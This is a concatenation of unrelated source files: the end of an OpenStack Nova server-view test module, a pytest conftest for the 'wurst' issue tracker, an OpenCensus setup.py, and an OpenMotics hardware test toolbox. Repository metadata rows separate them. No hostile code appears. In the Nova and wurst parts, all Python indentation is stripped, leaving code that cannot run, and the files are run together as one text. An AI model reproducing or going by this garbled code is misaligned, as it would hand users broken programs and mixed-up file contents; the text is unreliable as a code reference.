self.request.context, self.uuid)
output = self.view_builder.show(self.request, self.instance)
self.assertNotIn('fault', output['server'])
def test_build_server_detail_active_status(self):
# set the power state of the instance to running
self.instance['vm_state'] = vm_states.ACTIVE
self.instance['progress'] = 100
image_bookmark = "http://localhost/images/5"
flavor_bookmark = "http://localhost/flavors/1"
self_link = "http://localhost/v3/servers/%s" % self.uuid
bookmark_link = "http://localhost/servers/%s" % self.uuid
expected_server = {
"server": {
"id": self.uuid,
"user_id": "fake_user",
"tenant_id": "fake_project",
"updated": "2010-11-11T11:00:00Z",
"created": "2010-10-10T12:00:00Z",
"progress": 100,
"name": "test_server",
"status": "ACTIVE",
"hostId": '',
"image": {
"id": "5",
"links": [
{
"rel": "bookmark",
"href": image_bookmark,
},
],
},
"flavor": {
"id": "1",
"links": [
{
"rel": "bookmark",
"href": flavor_bookmark,
},
],
},
"addresses": {
'test1': [
{'version': 4, 'addr': '192.168.1.100',
'type': 'fixed', 'mac_addr': 'aa:aa:aa:aa:aa:aa'},
{'version': 6, 'addr': '2001:db8:0:1::1',
'type': 'fixed', 'mac_addr': 'aa:aa:aa:aa:aa:aa'}
]
},
"metadata": {},
"links": [
{
"rel": "self",
"href": self_link,
},
{
"rel": "bookmark",
"href": bookmark_link,
},
],
}
}
output = self.view_builder.show(self.request, self.instance)
self.assertThat(output, matchers.DictMatches(expected_server))
def test_build_server_detail_with_metadata(self):
metadata = []
metadata.append(models.InstanceMetadata(key="Open", value="Stack"))
metadata = nova_utils.metadata_to_dict(metadata)
self.instance['metadata'] = metadata
image_bookmark = "http://localhost/images/5"
flavor_bookmark = "http://localhost/flavors/1"
self_link = "http://localhost/v3/servers/%s" % self.uuid
bookmark_link = "http://localhost/servers/%s" % self.uuid
expected_server = {
"server": {
"id": self.uuid,
"user_id": "fake_user",
"tenant_id": "fake_project",
"updated": "2010-11-11T11:00:00Z",
"created": "2010-10-10T12:00:00Z",
"progress": 0,
"name": "test_server",
"status": "BUILD",
"hostId": '',
"image": {
"id": "5",
"links": [
{
"rel": "bookmark",
"href": image_bookmark,
},
],
},
"flavor": {
"id": "1",
"links": [
{
"rel": "bookmark",
"href": flavor_bookmark,
},
],
},
"addresses": {
'test1': [
{'version': 4, 'addr': '192.168.1.100',
'type': 'fixed', 'mac_addr': 'aa:aa:aa:aa:aa:aa'},
{'version': 6, 'addr': '2001:db8:0:1::1',
'type': 'fixed', 'mac_addr': 'aa:aa:aa:aa:aa:aa'},
]
},
"metadata": {"Open": "Stack"},
"links": [
{
"rel": "self",
"href": self_link,
},
{
"rel": "bookmark",
"href": bookmark_link,
},
],
}
}
output = self.view_builder.show(self.request, self.instance)
self.assertThat(output, matchers.DictMatches(expected_server))
class ServersAllExtensionsTestCase(test.TestCase):
"""Servers tests using default API router with all extensions enabled.
The intent here is to catch cases where extensions end up throwing
an exception because of a malformed request before the core API
    gets a chance to validate the request and return a 400 response.
For example, AccessIPsController extends servers.Controller::
| @wsgi.extends
| def create(self, req, resp_obj, body):
| context = req.environ['nova.context']
| if authorize(context) and 'server' in resp_obj.obj:
| resp_obj.attach(xml=AccessIPTemplate())
| server = resp_obj.obj['server']
| self._extend_server(req, server)
we want to ensure that the extension isn't barfing on an invalid
body.
"""
def setUp(self):
super(ServersAllExtensionsTestCase, self).setUp()
self.app = compute.APIRouterV3()
def test_create_missing_server(self):
# Test create with malformed body.
def fake_create(*args, **kwargs):
raise test.TestingException("Should not reach the compute API.")
self.stubs.Set(compute_api.API, 'create', fake_create)
req = fakes.HTTPRequestV3.blank('/servers')
req.method = 'POST'
req.content_type = 'application/json'
body = {'foo': {'a': 'b'}}
req.body = jsonutils.dumps(body)
res = req.get_response(self.app)
self.assertEqual(400, res.status_int)
def test_update_missing_server(self):
# Test update with malformed body.
def fake_update(*args, **kwargs):
raise test.TestingException("Should not reach the compute API.")
self.stubs.Set(compute_api.API, 'update', fake_update)
req = fakes.HTTPRequestV3.blank('/servers/1')
req.method = 'PUT'
req.content_type = 'application/json'
body = {'foo': {'a': 'b'}}
req.body = jsonutils.dumps(body)
res = req.get_response(self.app)
self.assertEqual(400, res.status_int)
class ServersInvalidRequestTestCase(test.TestCase):
"""Tests of places we throw 400 Bad Request from."""
def setUp(self):
super(ServersInvalidRequestTestCase, self).setUp()
ext_info = plugins.LoadedExtensionInfo()
self.controller = servers.ServersController(extension_info=ext_info)
def _invalid_server_create(self, body):
req = fakes.HTTPRequestV3.blank('/servers')
req.method = 'POST'
self.assertRaises(exception.ValidationError,
self.controller.create, req, body=body)
def test_create_server_no_body(self):
self._invalid_server_create(body=None)
def test_create_server_missing_server(self):
body = {'foo': {'a': 'b'}}
self._invalid_server_create(body=body)
def test_create_server_malformed_entity(self):
body = {'server': 'string'}
self._invalid_server_create(body=body)
def _unprocessable_server_update(self, body):
req = fakes.HTTPRequestV3.blank('/servers/%s' % FAKE_UUID)
req.method = 'PUT'
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.update, req, FAKE_UUID, body=body)
def test_update_server_no_body(self):
self._invalid_server_create(body=None)
def test_update_server_missing_server(self):
body = {'foo': {'a': 'b'}}
self._invalid_server_create(body=body)
def test_create_update_malformed_entity(self):
body = {'server': 'string'}
self._invalid_server_create(body=body)
class FakeExt(extensions.V3APIExtensionBase):
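    """Minimal fake extension used to exercise the server extension points."""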
name = "AccessIPs"
alias = 'os-access-ips'
version = 1
def fake_extension_point(self, *args, **kwargs):
pass
def get_controller_extensions(self):
return []
def get_resources(self):
return []
class TestServersExtensionPoint(test.NoDBTestCase):
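    """Tests that whitelisted extensions are loaded at the extension points."""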
def setUp(self):
super(TestServersExtensionPoint, self).setUp()
CONF.set_override('extensions_whitelist', ['os-access-ips'],
'osapi_v3')
self.stubs.Set(access_ips, 'AccessIPs', FakeExt)
def _test_load_extension_point(self, name):
setattr(FakeExt, 'server_%s' % name,
FakeExt.fake_extension_point)
ext_info = plugins.LoadedExtensionInfo()
controller = servers.ServersController(extension_info=ext_info)
self.assertEqual(
'os-access-ips',
list(getattr(controller,
'%s_extension_manager' % name))[0].obj.alias)
delattr(FakeExt, 'server_%s' % name)
def test_load_update_extension_point(self):
self._test_load_extension_point('update')
def test_load_rebuild_extension_point(self):
self._test_load_extension_point('rebuild')
def test_load_create_extension_point(self):
self._test_load_extension_point('create')
class TestServersExtensionSchema(test.NoDBTestCase):
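    """Tests that extension schemas are merged into the server schemas."""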
def setUp(self):
super(TestServersExtensionSchema, self).setUp()
CONF.set_override('extensions_whitelist', ['keypairs'], 'osapi_v3')
def _test_load_extension_schema(self, name):
setattr(FakeExt, 'get_server_%s_schema' % name,
FakeExt.fake_extension_point)
ext_info = plugins.LoadedExtensionInfo()
controller = servers.ServersController(extension_info=ext_info)
self.assertTrue(hasattr(controller, '%s_schema_manager' % name))
delattr(FakeExt, 'get_server_%s_schema' % name)
return getattr(controller, 'schema_server_%s' % name)
def test_load_create_extension_point(self):
        # The expected schema combines the base schema with the keypairs
        # schema, because of the extensions_whitelist set above.
expected_schema = copy.deepcopy(servers_schema.base_create)
expected_schema['properties']['server']['properties'].update(
keypairs_schema.server_create)
actual_schema = self._test_load_extension_schema('create')
self.assertEqual(expected_schema, actual_schema)
def test_load_update_extension_point(self):
        # The keypair extension does not provide update_server(), so this
        # checks that no extension schema is added to the base schema.
expected_schema = copy.deepcopy(servers_schema.base_update)
actual_schema = self._test_load_extension_schema('update')
self.assertEqual(expected_schema, actual_schema)
def test_load_rebuild_extension_point(self):
        # The keypair extension does not provide rebuild_server(), so this
        # checks that no extension schema is added to the base schema.
expected_schema = copy.deepcopy(servers_schema.base_rebuild)
actual_schema = self._test_load_extension_schema('rebuild')
self.assertEqual(expected_schema, actual_schema)
| apache-2.0 | 2,637,198,558,954,699,000 | 40.595554 | 79 | 0.559654 | false |
kcsry/wurst | tests/conftest.py | 1 | 1702 | import os
import pytest
import toml
from rest_framework.test import APIClient
from six import StringIO
from wurst.core.consts import StatusCategory
from wurst.core.models import IssueType, Priority, Project, Status
from wurst.core.utils.schema_import import SchemaImporter
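# Path to the bundled "basic" schema definition shipped with wurst.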
BASIC_SCHEMA_PATH = os.path.join(
os.path.dirname(__file__), "..", "wurst", "core", "schemata", "basic.toml"
)
BASIC_SCHEMA_DATA = toml.load(BASIC_SCHEMA_PATH)
@pytest.mark.django_db
@pytest.fixture
def basic_schema():
schi = SchemaImporter()
schi.stdout = StringIO()
schi.import_from_data(BASIC_SCHEMA_DATA)
return schi.objects
@pytest.mark.django_db
@pytest.fixture
def project():
return Project.objects.get_or_create(name="Test", slug="test", prefix="T-")[0]
@pytest.mark.django_db
@pytest.fixture
def task_type():
return IssueType.objects.get_or_create(name="Task", slug="task")[0]
@pytest.mark.django_db
@pytest.fixture
def normal_priority():
return Priority.objects.get_or_create(name="Normal", slug="normal")[0]
@pytest.mark.django_db
@pytest.fixture
def todo_status():
return Status.objects.get_or_create(name="To Do", slug="to-do")[0]
@pytest.mark.django_db
@pytest.fixture
def done_status():
return Status.objects.get_or_create(name="Done", slug="done", category=StatusCategory.DONE)[0]
@pytest.mark.django_db
@pytest.fixture
def closed_status():
return Status.objects.get_or_create(name="Closed", slug="closed", category=StatusCategory.CLOSED)[0]
@pytest.fixture()
def admin_api_client(admin_user):
api_client = APIClient()
api_client.login(username=admin_user.username, password="password")
api_client.user = admin_user
return api_client
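# Usage sketch (assumed pytest wiring): tests request these fixtures by name,
# e.g.
#   def test_create_issue(admin_api_client, project, task_type, todo_status):
#       ...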
| mit | 4,476,096,679,161,664,500 | 24.029412 | 104 | 0.727967 | false |
census-instrumentation/opencensus-python | contrib/opencensus-ext-requests/setup.py | 1 | 1936 | # Copyright 2019, OpenCensus Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from setuptools import find_packages, setup
from version import __version__
setup(
name='opencensus-ext-requests',
version=__version__, # noqa
author='OpenCensus Authors',
author_email='[email protected]',
classifiers=[
'Intended Audience :: Developers',
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
],
description='OpenCensus Requests Integration',
include_package_data=True,
long_description=open('README.rst').read(),
install_requires=[
'opencensus >= 0.8.dev0, < 1.0.0',
'wrapt >= 1.0.0, < 2.0.0',
],
extras_require={},
license='Apache-2.0',
packages=find_packages(exclude=('tests',)),
namespace_packages=[],
url='https://github.com/census-instrumentation/opencensus-python/tree/master/contrib/opencensus-ext-requests', # noqa: E501
zip_safe=False,
)
| apache-2.0 | 4,184,736,613,953,377,000 | 36.960784 | 128 | 0.66374 | false |
openmotics/gateway | testing/cicd/tests/toolbox.py | 1 | 36876 | # Copyright (C) 2020 OpenMotics BV
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from __future__ import absolute_import
import logging
import os
import time
from contextlib import contextmanager
from datetime import datetime
import hypothesis
import requests
import ujson as json
from requests.exceptions import ConnectionError, RequestException, Timeout
from tests.hardware_layout import INPUT_MODULE_LAYOUT, OUTPUT_MODULE_LAYOUT, \
TEMPERATURE_MODULE_LAYOUT, TEST_PLATFORM, TESTER, Input, Module, Output, \
TestPlatform, Shutter, SHUTTER_MODULE_LAYOUT
logger = logging.getLogger(__name__)
if False: # MYPY
from typing import Any, Dict, List, Optional, Tuple, Union
class Client(object):
def __init__(self, id, host, auth=None):
# type: (str, str, List[str]) -> None
self._id = id
self._host = host
self._auth = auth
self._default_kwargs = {'verify': False}
self._token = None # type: Optional[str]
@property
def token(self):
# type: () -> Optional[str]
if self._token is None:
self._token = self.login()
return self._token
def login(self, success=True, timeout=30):
# type: (bool, float) -> Optional[str]
if self._auth:
self._token = None
params = {'username': self._auth[0], 'password': self._auth[1], 'accept_terms': True}
data = self.get('/login', params=params, use_token=False, success=success, timeout=timeout)
if 'token' in data:
return data['token']
else:
raise Exception('unexpected response {}'.format(data))
else:
return None
def get(self, path, params=None, success=True, use_token=True, timeout=30):
# type: (str, Dict[str,Any], bool, bool, float) -> Any
return self._request(requests.get, path, params=params,
success=success, use_token=use_token, timeout=timeout)
def post(self, path, data=None, files=None, success=True, use_token=True, timeout=30):
# type: (str, Dict[str,Any], Dict[str,Any], bool, bool, float) -> Any
return self._request(requests.post, path, data=data, files=files,
success=success, use_token=use_token, timeout=timeout)
def _request(self, f, path, params=None, data=None, files=None, success=True, use_token=True, timeout=30):
# type: (Any, str, Dict[str,Any], Dict[str,Any], Dict[str,Any], bool, bool, float) -> Any
params = params or {}
headers = requests.utils.default_headers()
uri = 'https://{}{}'.format(self._host, path)
if use_token:
headers['Authorization'] = 'Bearer {}'.format(self.token)
# logger.debug('GET {} {} {}'.format(self._id, path, params))
job_name = os.getenv('JOB_NAME')
build_number = os.getenv('BUILD_NUMBER')
if job_name and build_number:
headers['User-Agent'] += ' {}/{}'.format(job_name, build_number)
_, _, current_test = os.getenv('PYTEST_CURRENT_TEST', '').rpartition('::')
if current_test:
headers['User-Agent'] += ' pytest/{}'.format(current_test)
since = time.time()
while since > time.time() - timeout:
try:
response = f(uri, params=params, data=data, files=files,
headers=headers, **self._default_kwargs)
assert response.status_code != 404, 'not found {0}: {1}'.format(path, response.content)
                resp_data = response.json()  # avoid shadowing the request body argument
                if success and 'success' in resp_data:
                    assert resp_data['success'], 'content={}'.format(response.content.decode())
                return resp_data
            except (ConnectionError, RequestException) as exc:
                logger.debug('Request {} {} failed {}, retrying...'.format(self._id, path, exc))
                time.sleep(16)
raise Timeout('Request {} {} failed after {:.2f}s'.format(self._id, path, time.time() - since))
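# Usage sketch (host and credentials below are illustrative assumptions):
#   client = Client('dut', '192.168.0.10', auth=['openmotics', 'secret'])
#   status = client.get('/get_status')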
class TesterGateway(object):
def __init__(self, client):
# type: (Client) -> None
self._client = client
self._last_received_at = 0.0
self._last_data = {} # type: Dict[str,Any]
self._inputs = {} # type: Dict[int,bool]
self.update_events()
def get_last_outputs(self):
# type: () -> List[str]
if self._last_data:
outputs = self._last_data['events'][-1]['outputs']
return ['?' if x is None else str(x) for x in outputs]
else:
return []
def get(self, path, params=None, success=True, use_token=True):
# type: (str, Dict[str,Any], bool, bool) -> Any
return self._client.get(path, params=params, success=success, use_token=use_token)
def toggle_output(self, output_id, delay=0.2, inverted=False, is_dimmer=False):
self.toggle_outputs([output_id], delay=delay, inverted=inverted, is_dimmer=is_dimmer)
def toggle_outputs(self, output_ids, delay=0.2, inverted=False, is_dimmer=False):
temporarily_state = not inverted
for output_id in output_ids:
payload = {'id': output_id, 'is_on': temporarily_state}
if is_dimmer and temporarily_state:
payload['dimmer'] = 100
self.get('/set_output', payload)
time.sleep(delay)
for output_id in output_ids:
payload = {'id': output_id, 'is_on': not temporarily_state}
if is_dimmer and not temporarily_state:
payload['dimmer'] = 100
self.get('/set_output', payload)
def log_events(self):
# type: () -> None
for event in (x for x in self._last_data['events'] if 'input_id' in x):
received_at, input_id, input_status = (event['received_at'], event['input_id'], event['input_status'])
timestamp = datetime.fromtimestamp(received_at).strftime('%y-%m-%d %H:%M:%S,%f')
logger.error('{} received event {} -> {}'.format(timestamp, input_id, input_status))
def update_events(self):
# type: () -> bool
data = self.get('/plugins/event_observer/events')
self._last_data = data
changed = False
for event in (x for x in self._last_data['events'] if 'input_id' in x):
received_at, input_id, input_status = (event['received_at'], event['input_id'], event['input_status'])
if received_at >= self._last_received_at:
changed = True
self._last_received_at = received_at
self._inputs[input_id] = bool(input_status)
return changed
def reset(self):
# type: () -> None
self._inputs = {}
def receive_input_event(self, entity, input_id, input_status, between):
# type: (Union[Output, Shutter], int, bool, Tuple[float, float]) -> bool
cooldown, deadline = between
timeout = deadline - cooldown
if input_id is None:
raise ValueError('Invalid {} for events, is not connected to a tester input'.format(entity))
if cooldown > 0:
logger.debug('Waiting {:.2f}s before event'.format(cooldown))
self.reset()
time.sleep(cooldown)
since = time.time()
while since > time.time() - timeout:
if input_id in self._inputs and input_status == self._inputs[input_id]:
logger.debug('Received event {} status={} after {:.2f}s'.format(entity, self._inputs[input_id], time.time() - since))
return True
if self.update_events():
continue
time.sleep(0.2)
logger.error('Did not receive event {} status={} after {:.2f}s'.format(entity, input_status, time.time() - since))
self.log_events()
return False
def wait_for_input_status(self, entity, input_id, input_status, timeout):
# type: (Union[Output, Shutter], int, bool, Optional[float]) -> bool
since = time.time()
current_status = None
while timeout is None or since > time.time() - timeout:
data = self.get('/get_input_status')
current_status = {s['id']: s['status'] == 1 for s in data['status']}.get(input_id, None)
if input_status == current_status:
logger.debug('Get status {} status={}, after {:.2f}s'.format(entity, input_status, time.time() - since))
return True
if timeout is None:
break # Immediate check
time.sleep(max(0.2, timeout / 10.0))
logger.error('Get status {} status={} != expected {}, timeout after {:.2f}s'.format(entity, current_status, input_status, time.time() - since))
return False
class Toolbox(object):
def __init__(self):
# type: () -> None
self._tester = None # type: Optional[TesterGateway]
self._dut = None # type: Optional[Client]
self._dut_energy_cts = None # type: Optional[List[Tuple[int, int]]]
@property
def tester(self):
# type: () -> TesterGateway
if self._tester is None:
tester_auth = os.environ['OPENMOTICS_TESTER_AUTH'].split(':')
tester_host = os.environ['OPENMOTICS_TESTER_HOST']
self._tester = TesterGateway(Client('tester', tester_host, auth=tester_auth))
return self._tester
@property
def dut(self):
# type: () -> Client
if self._dut is None:
dut_auth = os.environ['OPENMOTICS_DUT_AUTH'].split(':')
dut_host = os.environ['OPENMOTICS_DUT_HOST']
self._dut = Client('dut', dut_host, auth=dut_auth)
return self._dut
@property
def dut_energy_cts(self):
if self._dut_energy_cts is None:
cts = []
energy_modules = self.list_energy_modules(module_type='E')
for module in energy_modules:
cts += [(module['id'], input_id) for input_id in range(12)]
self._dut_energy_cts = cts
return self._dut_energy_cts
def initialize(self):
# type: () -> None
logger.info('checking prerequisites')
self.ensure_power_on()
try:
self.dut.login(success=False)
except Exception:
logger.info('initializing gateway...')
self.authorized_mode_start()
self.create_or_update_user()
self.dut.login()
# For now, while some code knows the difference between emulated, physical, virtual, ..., the code will mainly work
# using the i, O, s, ... letters instead (so virtual and non-virtual).
# TODO: Change this in the future, as it needs a new API call on the GW.
expected_modules = {Module.HardwareType.VIRTUAL: {},
Module.HardwareType.PHYSICAL: {}} # Limit it to physical and virtual for now
for module in OUTPUT_MODULE_LAYOUT + INPUT_MODULE_LAYOUT + TEMPERATURE_MODULE_LAYOUT + SHUTTER_MODULE_LAYOUT:
hardware_type = Module.HardwareType.VIRTUAL if module.hardware_type == Module.HardwareType.VIRTUAL else Module.HardwareType.PHYSICAL
if module.mtype not in expected_modules[hardware_type]:
expected_modules[hardware_type][module.mtype] = 0
expected_modules[hardware_type][module.mtype] += 1
logger.info('Expected modules: {0}'.format(expected_modules))
missing_modules = set()
modules = self.count_modules('master')
logger.info('Current modules: {0}'.format(modules))
for mtype, expected_amount in expected_modules[Module.HardwareType.PHYSICAL].items():
if modules.get(mtype, 0) == 0:
missing_modules.add(mtype)
modules_info = self.list_modules()['master'].values()
if not any(v['type'] == 'C' for v in modules_info):
missing_modules.add('C')
if not any(v['type'] == 'I' and v['is_can'] for v in modules_info):
missing_modules.add('C')
if missing_modules:
logger.info('Discovering modules...')
self.discover_modules(output_modules='O' in missing_modules,
input_modules='I' in missing_modules,
shutter_modules='R' in missing_modules,
dimmer_modules='D' in missing_modules,
temp_modules='T' in missing_modules,
can_controls='C' in missing_modules,
ucans='C' in missing_modules)
modules = self.count_modules('master')
logger.info('Discovered modules: {0}'.format(modules))
for mtype, expected_amount in expected_modules[Module.HardwareType.PHYSICAL].items():
assert modules.get(mtype, 0) == expected_amount, 'Expected {0} modules {1}'.format(expected_amount, mtype)
try:
for mtype, expected_amount in expected_modules[Module.HardwareType.VIRTUAL].items():
assert modules.get(mtype, 0) >= expected_amount
except Exception:
logger.info('Adding virtual modules...')
for mtype, expected_amount in expected_modules[Module.HardwareType.VIRTUAL].items():
extra_needed_amount = expected_amount - modules.get(mtype, 0)
assert extra_needed_amount > 0
self.add_virtual_modules(module_amounts={mtype: extra_needed_amount})
modules = self.count_modules('master')
logger.info('Virtual modules: {0}'.format(modules))
for mtype, expected_amount in expected_modules[Module.HardwareType.VIRTUAL].items():
assert modules.get(mtype, 0) >= expected_amount
# TODO ensure discovery synchonization finished.
for module in OUTPUT_MODULE_LAYOUT:
if module.outputs:
self.ensure_output_exists(module.outputs[-1], timeout=300)
for module in INPUT_MODULE_LAYOUT:
if module.inputs:
self.ensure_input_exists(module.inputs[-1], timeout=300)
for module in SHUTTER_MODULE_LAYOUT:
if module.shutters:
self.ensure_shutter_exists(module.shutters[-1], timeout=300)
def print_logs(self):
# type: () -> None
try:
data = self.tester.get('/plugins/syslog_receiver/logs', success=False)
for log in data['logs']:
print(log)
except Exception:
print('Failed to retrieve logs')
def factory_reset(self, confirm=True):
# type: (bool) -> Dict[str,Any]
assert self.dut._auth
logger.debug('factory reset')
params = {'username': self.dut._auth[0], 'password': self.dut._auth[1], 'confirm': confirm, 'can': False}
return self.dut.get('/factory_reset', params=params, success=confirm)
def list_modules(self):
# type: () -> Dict[str, Any]
return self.dut.get('/get_modules_information')['modules']
def count_modules(self, category):
modules = {}
for address, info in self.list_modules()[category].items():
if info['type'] not in modules:
modules[info['type']] = 0
modules[info['type']] += 1
return modules
def assert_modules(self, module_type, min_modules=1):
# type: (str, int) -> List[Dict[str, Any]]
data = self.list_modules()
modules = []
for address, info in data['master'].items():
if info['type'] != module_type:
continue
modules.append(info)
assert len(modules) >= min_modules, 'Not enough modules of type \'{}\' available in {}'.format(module_type, data)
return modules
def list_energy_modules(self, module_type, min_modules=1):
# type: (str, int) -> List[Dict[str, Any]]
data = self.list_modules()
modules = []
for address, info in data['energy'].items():
if info['type'] != module_type or not info['firmware']:
continue
modules.append(info)
assert len(modules) >= min_modules, 'Not enough energy modules of type \'{}\' available in {}'.format(module_type, data)
return modules
def authorized_mode_start(self):
# type: () -> None
logger.debug('start authorized mode')
self.tester.toggle_outputs(TESTER.Buttons.dut, delay=15)
def authorized_mode_stop(self):
# type: () -> None
self.tester.toggle_outputs(TESTER.Buttons.dut)
def create_or_update_user(self, success=True):
# type: (bool) -> None
logger.info('create or update test user')
assert self.dut._auth
user_data = {'username': self.dut._auth[0], 'password': self.dut._auth[1]}
self.dut.get('/create_user', params=user_data, use_token=False, success=success)
def get_gateway_version(self):
# type: () -> str
return self.dut.get('/get_version')['gateway']
def get_firmware_versions(self):
# type: () -> Dict[str,str]
modules = self.dut.get('/get_modules_information')['modules']['master']
versions = {'M': self.dut.get('/get_status')['version']}
for data in (x for x in modules.values() if 'firmware' in x):
module = 'C' if data.get('is_can', False) else data['type']
versions[module] = data['firmware']
return versions
def module_discover_start(self):
# type: () -> None
logger.debug('start module discover')
self.dut.get('/module_discover_start')
for _ in range(10):
data = self.dut.get('/module_discover_status')
if data['running']:
return
time.sleep(0.2)
def module_discover_stop(self):
# type: () -> None
logger.debug('stop module discover')
self.dut.get('/module_discover_stop')
def discover_modules(self, output_modules=False, input_modules=False, shutter_modules=False, dimmer_modules=False, temp_modules=False, can_controls=False, ucans=False, timeout=120):
# TODO: Does not work yet for the Core(+) as they don't have this call implemented.
logger.debug('Discovering modules')
since = time.time()
# [WIP] tried to disable ucan logic for the factory reset test (CAN FX call)
# but it did not enable us to check the behaviour
if ucans:
ucan_inputs = []
for module in INPUT_MODULE_LAYOUT:
if module.is_can:
ucan_inputs += module.inputs
logger.debug('Toggle uCAN inputs %s', ucan_inputs)
for ucan_input in ucan_inputs:
self.tester.toggle_output(ucan_input.tester_output_id, delay=0.5)
time.sleep(0.5)
time.sleep(0.5) # Give a brief moment for the CC to settle
new_modules = []
self.clear_module_discovery_log()
self.module_discover_start()
try:
addresses = []
if output_modules:
self.tester.toggle_output(TESTER.Button.output, delay=0.5)
new_modules += self.watch_module_discovery_log(module_amounts={'O': 1}, addresses=addresses)
if shutter_modules:
self.tester.toggle_output(TESTER.Button.shutter, delay=0.5)
new_modules += self.watch_module_discovery_log(module_amounts={'R': 1}, addresses=addresses)
if input_modules:
self.tester.toggle_output(TESTER.Button.input, delay=0.5)
new_modules += self.watch_module_discovery_log(module_amounts={'I': 1}, addresses=addresses)
if dimmer_modules:
self.tester.toggle_output(TESTER.Button.dimmer, delay=0.5)
new_modules += self.watch_module_discovery_log(module_amounts={'D': 1}, addresses=addresses)
if temp_modules:
self.tester.toggle_output(TESTER.Button.temp, delay=0.5)
new_modules += self.watch_module_discovery_log(module_amounts={'T': 1}, addresses=addresses)
if can_controls or ucans:
self.tester.toggle_output(TESTER.Button.can, delay=0.5)
module_amounts = {'C': 1}
if ucans:
module_amounts.update({'I': 1, 'T': 1})
new_modules += self.watch_module_discovery_log(module_amounts=module_amounts, addresses=addresses)
new_module_addresses = set(module['address'] for module in new_modules)
finally:
self.module_discover_stop()
        while since > time.time() - timeout:
            data = self.dut.get('/get_modules_information')
            synced_addresses = set(data['modules']['master'].keys())
            if new_module_addresses.issubset(synced_addresses):
                return True
            time.sleep(2)
        raise AssertionError('Did not discover required modules')
def add_virtual_modules(self, module_amounts, timeout=120):
since = time.time()
desired_new_outputs = module_amounts.get('o', 0)
desired_new_inputs = module_amounts.get('i', 0)
def _get_current_virtual_modules():
virtual_modules = {}
data = self.dut.get('/get_modules_information')
for entry in data['modules']['master'].values():
if entry['is_virtual']:
virtual_modules.setdefault(entry['type'], set()).add(entry['address'])
return virtual_modules
previous_virtual_modules = _get_current_virtual_modules()
for _ in range(desired_new_outputs):
self.dut.get('/add_virtual_output_module')
time.sleep(2)
for _ in range(desired_new_inputs):
self.dut.get('/add_virtual_input_module')
time.sleep(2)
        # TODO: We could use the module discovery log as well, but adding
        # virtual modules doesn't generate events.
new_outputs, new_inputs = (0, 0)
while since > time.time() - timeout:
current_virtual_modules = _get_current_virtual_modules()
new_outputs = len(current_virtual_modules.get('o', set()) - previous_virtual_modules.get('o', set()))
new_inputs = len(current_virtual_modules.get('i', set()) - previous_virtual_modules.get('i', set()))
if new_outputs == desired_new_outputs and new_inputs == desired_new_inputs:
return True
time.sleep(5)
        raise AssertionError('Did not discover required virtual modules, outputs: %s inputs: %s'
                             % (new_outputs, new_inputs))
def clear_module_discovery_log(self):
self.dut.get('/get_module_log')
def watch_module_discovery_log(self, module_amounts, timeout=10, addresses=None):
# type: (Dict[str, int], float, Optional[List[str]]) -> List[Dict[str, Any]]
def format_module_amounts(amounts):
return ', '.join('{}={}'.format(mtype, amount) for mtype, amount in amounts.items())
since = time.time()
all_entries = []
desired_entries = []
found_module_amounts = {}
if addresses is None:
addresses = []
while since > time.time() - timeout:
log = self.dut.get('/get_module_log')['log']
            # Log format: {'code': '<NEW|EXISTING|DUPLICATE|UNKNOWN>',
            #             'module_nr': <module number in its category>,
            #             'category': '<SHUTTER|INPUT|OUTPUT>',
# 'module_type': '<I|O|T|D|i|o|t|d|C>,
# 'address': '<module address>'}
all_entries += log
for entry in log:
if entry['code'] in ['DUPLICATE', 'UNKNOWN']:
continue
module_type = entry['module_type']
if module_type not in module_amounts:
continue
address = entry['address']
if address not in addresses:
addresses.append(address)
if module_type not in found_module_amounts:
found_module_amounts[module_type] = 0
found_module_amounts[module_type] += 1
desired_entries.append(entry)
logger.debug('Discovered {} module: {} ({})'.format(entry['code'],
entry['module_type'],
entry['address']))
if found_module_amounts == module_amounts:
logger.debug('Discovered required modules: {}'.format(format_module_amounts(found_module_amounts)))
return desired_entries
time.sleep(2)
raise AssertionError('Did not discover required modules: {}. Raw log: {}'.format(
format_module_amounts(module_amounts), all_entries
))
def discover_energy_module(self):
# type: () -> None
self.tester.get('/set_output', {'id': TESTER.Power.bus2, 'is_on': True})
time.sleep(5)
try:
logger.debug('discover Energy module')
self.dut.get('/start_power_address_mode')
self.tester.toggle_output(TESTER.Button.energy, 1.0)
self.assert_energy_modules(1, timeout=60)
finally:
self.dut.get('/stop_power_address_mode')
def assert_energy_modules(self, count, timeout=30):
        # type: (int, float) -> List[Dict[str, Any]]
        since = time.time()
        modules = []
        while since > time.time() - timeout:
            # Re-read the energy category on each poll instead of accumulating
            # dict keys into the list, which over-counted across iterations.
            modules = list(self.dut.get('/get_modules_information')['modules']['energy'].values())
if len(modules) >= count:
logger.debug('discovered {} modules, done'.format(count))
return modules
time.sleep(2)
raise AssertionError('expected {} modules in {}'.format(count, modules))
def power_off(self):
# type: () -> None
logger.debug('power off')
self.tester.get('/set_output', {'id': TESTER.Power.dut, 'is_on': False})
time.sleep(2)
def ensure_power_on(self):
# type: () -> None
if not self.health_check(timeout=0.2, skip_assert=True):
return
logger.info('power on')
if TEST_PLATFORM == TestPlatform.CORE_PLUS:
timeout = 600 # After a potential factory reset, the Core+ has to wipe a lot more EEPROM and is therefore slower
else:
timeout = 300
self.tester.get('/set_output', {'id': TESTER.Power.dut, 'is_on': True})
logger.info('waiting for gateway api to respond...')
self.health_check(timeout=timeout)
